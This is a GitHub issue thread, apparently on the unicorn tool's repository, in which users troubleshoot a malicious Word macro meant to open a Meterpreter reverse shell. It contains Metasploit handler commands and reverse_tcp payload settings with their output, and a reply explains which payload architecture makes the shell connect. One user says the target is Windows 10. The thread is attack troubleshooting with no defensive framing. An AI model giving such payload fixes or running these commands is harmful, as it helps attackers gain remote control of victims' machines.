powershell.exe has stopped working when executing the payload
Closed this issue · 5 comments
Recently I tried using a macro to get a Meterpreter session. After executing the macro Word file, at first I got "exploit complete but no session open". I changed the following in Metasploit:
set targetarchitecture x64
set payload windows/x64/meterpreter/reverse_tcp
exploit -j
Then I get this:
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Starting the payload handler...
msf exploit(handler) > [*] Encoded stage with x64/xor
[*] Sending encoded stage (1189463 bytes) to 127.0.0.1
(At this point I got a pop-up message saying that powershell.exe has stopped working.)
[-] OpenSSL::SSL::SSLError SSL_accept SYSCALL returned=5 errno=0 state=SSLv2/v3 read client hello A
How do I fix this problem?
Don't use the x64 payload; unicorn automatically downgrades the process to a 32-bit process on Windows regardless of 64 or 32 bit. It's crashing because it's trying to inject 64-bit shellcode into a 32-bit process. Use the standard windows/meterpreter/reverse_tcp or reverse_https.
Using reverse_tcp and reverse_https results in "exploit complete, but no session created". How to fix? I'm attacking Win10.
I fixed this stuff. Thank you for your reply!!!
How did you fix it, please? I'm having this issue right now.